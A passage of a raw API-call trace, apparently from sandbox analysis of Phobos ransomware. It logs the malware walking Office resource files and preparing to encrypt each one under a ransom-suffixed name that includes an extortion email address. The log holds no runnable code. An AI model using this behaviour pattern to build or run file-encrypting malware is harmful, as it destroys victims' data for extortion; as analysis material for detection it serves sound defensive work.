"c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.512] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=681312) returned 1 [0122.512] CloseHandle (hObject=0x334) returned 1 [0122.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll")) returned 0x2020 [0122.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.513] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.513] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.513] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.513] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=11104) returned 1 [0122.513] CloseHandle (hObject=0x334) returned 1 [0122.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll")) returned 0x2020 [0122.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.513] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.513] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.513] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.514] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=52576) returned 1 [0122.514] CloseHandle (hObject=0x334) returned 1 [0122.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll")) returned 0x2020 [0122.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.515] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.515] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.515] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=286560) returned 1 [0122.515] CloseHandle (hObject=0x334) returned 1 [0122.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll")) returned 0x2020 [0122.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.516] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.516] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.516] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.516] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=107360) returned 1 [0122.517] CloseHandle (hObject=0x334) returned 1 [0122.517] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll")) returned 0x2020 [0122.517] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.517] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.517] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.517] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.517] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=581984) returned 1 [0122.517] CloseHandle (hObject=0x334) returned 1 [0122.517] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll")) returned 0x2020 [0122.517] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.517] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.518] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.518] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.518] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=371552) returned 1 [0122.518] CloseHandle (hObject=0x334) returned 1 [0122.518] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll")) returned 0x2020 [0122.519] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.519] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.519] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.519] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.520] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=13152) returned 1 [0122.520] CloseHandle (hObject=0x334) returned 1 [0122.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll")) returned 0x2020 [0122.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.520] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.521] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=16736) returned 1 [0122.521] CloseHandle (hObject=0x334) returned 1 [0122.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll")) returned 0x2020 [0122.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.521] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.523] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=26976) returned 1 [0122.523] CloseHandle (hObject=0x334) returned 1 [0122.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll")) returned 0x2020 [0122.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.523] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.523] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.523] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.523] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=488800) returned 1 [0122.523] CloseHandle (hObject=0x334) returned 1 [0122.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll")) returned 0x2020 [0122.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.524] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.525] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=154464) returned 1 [0122.525] CloseHandle (hObject=0x334) returned 1 [0122.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll")) returned 0x2020 [0122.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.525] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.526] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1137504) returned 1 [0122.526] CloseHandle (hObject=0x334) returned 1 [0122.526] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll")) returned 0x2020 [0122.526] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.526] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.526] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.526] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.527] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=152416) returned 1 [0122.527] CloseHandle (hObject=0x334) returned 1 [0122.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll")) returned 0x2020 [0122.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.527] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.527] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.527] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.527] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1276256) returned 1 [0122.527] CloseHandle (hObject=0x334) returned 1 [0122.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll")) returned 0x2020 [0122.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.528] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.529] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=15712) returned 1 [0122.529] CloseHandle (hObject=0x334) returned 1 [0122.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll")) returned 0x2020 [0122.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.529] CreateFileW 